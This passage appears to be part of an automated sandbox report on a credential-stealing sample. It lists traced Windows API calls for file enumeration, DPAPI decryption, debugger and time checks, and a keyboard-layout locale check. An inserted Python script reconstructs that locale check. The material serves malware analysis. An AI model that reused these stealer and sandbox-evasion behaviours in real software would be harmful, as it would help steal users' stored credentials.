                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                  • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction ID: 6c45e323eb97f3f5fe0a980a2654476231ca5aa70f4130f23701df1e8cec4963
                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction Fuzzy Hash: FCB150719203189BCF64FFA4DDA5EEEB37AAF54300F4081A9A50E56258EF345B48CF91
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*$@
                                  • API String ID: 433455689-2355794846
                                  • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                  • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022E1B8A
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 022E1BDA
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 022E1BF0
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022E1FA7
                                  • DeleteFileA.KERNEL32(00000000), ref: 022E2031
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022E2087
                                  • FindClose.KERNEL32(000000FF), ref: 022E2099
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 1415058207-0
                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction ID: 10ae1d3b714fbd67eee01f00ba40f8fca7763c1ebdd70c10f4578533f8b38cf4
                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction Fuzzy Hash: 7212D0719203189BCB59FBA4CDA5EEDB37AAF64300F4041B9A60E62194EF745F89CF50
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022EE0C5
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 022EE115
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 022EE12B
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE647
                                  • FindClose.KERNEL32(000000FF), ref: 022EE659
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2325840235-0
                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction ID: 1abcb59c951704e9f86fcd69d1cf7d4e12a5de39169595e985caae893467662b
                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction Fuzzy Hash: F1F190715243189ACB59EBA4DDA5EEEF33ABF24700F8041E9A14E62154EF345F89CF50
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                  • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
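The chain in the record above (GetKeyboardLayoutList with a zero count, LocalAlloc with flag 0x40, GetKeyboardLayoutList again, GetLocaleInfoA with LCType 2 and a 0x200-byte buffer, LocalFree, and "/" as the only string constant) is the shape of a keyboard-layout enumeration that a locale-gated sample performs before deciding whether to keep running. The Python below replays that call sequence with ctypes on the analysis VM so you can see the language list such a check would produce there. It is an added example, the editor's reconstruction rather than code from the sample: it assumes the low word of each layout handle is what gets passed to GetLocaleInfoA, which the trace does not show, and it makes no claim about which languages the sample acts on.

```python
"""Replay of the GetKeyboardLayoutList -> LocalAlloc -> GetLocaleInfoA chain in the record
above. Added example (the editor's reconstruction, not the sample's code): it assumes the
sample feeds the low word of each HKL to GetLocaleInfoA, which the trace does not show.
The Win32 calls run only on Windows; the two helpers run anywhere."""
import ctypes
import sys

LOCALE_SLANGUAGE = 0x0002   # LCType 00000002 in the trace: localized language name
LCDATA_CCH = 0x200          # cchData 00000200 in the trace


def hkl_to_langid(hkl: int) -> int:
    """Low word of a keyboard-layout handle is the LANGID; with the default sort order
    that value is also a usable LCID for GetLocaleInfoA (assumption noted above)."""
    return hkl & 0xFFFF


def join_languages(names) -> str:
    """'/' is the record's only string constant; the lstrcpy/lstrcat helpers in the
    trace are consistent with joining the language names with it."""
    return "/".join(names)


def installed_layout_languages():
    """Windows only: enumerate the keyboard layouts the way the trace does (size query,
    allocate, second call) and resolve each one to its language name."""
    if sys.platform != "win32":
        raise OSError("GetKeyboardLayoutList/GetLocaleInfoA need Windows")
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    user32.GetKeyboardLayoutList.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_void_p)]
    user32.GetKeyboardLayoutList.restype = ctypes.c_int
    kernel32.GetLocaleInfoA.argtypes = [ctypes.c_uint, ctypes.c_uint, ctypes.c_char_p, ctypes.c_int]
    kernel32.GetLocaleInfoA.restype = ctypes.c_int

    count = user32.GetKeyboardLayoutList(0, None)   # GetKeyboardLayoutList(0, NULL): size query
    hkls = (ctypes.c_void_p * count)()               # stands in for the LocalAlloc(LPTR, ...) buffer
    user32.GetKeyboardLayoutList(count, hkls)        # second call fills the array
    names = []
    for hkl in hkls:
        buf = ctypes.create_string_buffer(LCDATA_CCH)
        if kernel32.GetLocaleInfoA(hkl_to_langid(hkl or 0), LOCALE_SLANGUAGE, buf, LCDATA_CCH) > 0:
            names.append(buf.value.decode("mbcs", "replace"))
    return names


if __name__ == "__main__":
    langs = installed_layout_languages()
    print(langs)
    print(join_languages(langs))   # the "/"-separated view the chain above builds
```

Run it inside the analysis VM before detonating a sample that carries this chain: if the list contains only the layouts of the host's default image, a check keyed on installed languages sees exactly that and nothing else.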
                                  APIs
                                  • memset.MSVCRT ref: 022ECABA
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                  • memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                  • lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                  • lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                  • lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction ID: 2c08af503c13e0fbdf5f87d3fc45c0b002e540d72ab0b34ad572449b51ee6aef
                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction Fuzzy Hash: 1141807895421AEFDB10DFD0DC88BEEBBB8BB44304F1045A9E60AA6284D7745B84CF91
                                  APIs
                                  • memset.MSVCRT ref: 0040C853
                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008836E0), ref: 0040C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                  APIs
                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00883680,?,0042110C,?,00000000,?), ref: 0041696C
                                  • sscanf.NTDLL ref: 00416999
                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00883680,?,0042110C), ref: 004169B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00883680,?,0042110C), ref: 004169C0
                                  • ExitProcess.KERNEL32 ref: 004169DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID: B
                                  • API String ID: 2533653975-2248957098
                                  • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                  • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N@
                                  • API String ID: 4291131564-4229412743
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022F7E48
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022F7E60
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 022F7E74
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022F7EC9
                                  • LocalFree.KERNEL32(00000000), ref: 022F7F89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID:
                                  • API String ID: 3090951853-0
                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction ID: 5dfc4d8cbe0b65a59f697f838489a01278a062af1954ac38985a9f90d1b60f36
                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction Fuzzy Hash: E3415B71960218ABDB64DF94DC98FEDF3B5FB54700F1041A9E109A6284DB742F89CF90
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 022FBE09
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022FBE1E
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022FBE29
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 022FBE45
                                  • TerminateProcess.KERNEL32(00000000), ref: 022FBE4C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 66904e2d839ba537b90f339f0b5abf305c8a958dd3c8f097508dc97e1289fb80
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: 4721C0BC910305DFDB54DF69F9886967BE4FB0E304F50403AE90A872A4EBB05981EF49
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022E74B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E74BB
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022E74E8
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022E750B
                                  • LocalFree.KERNEL32(?), ref: 022E7515
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: ac2e596f8264ad7b28ded79ca0de264b4ff0e531e91211e9fc5c2b9ce0003d93
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 75010075A90208BBEB10DFD4DD45F9D77B9EB44704F104155FB06AA2C4D6B0AA00CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
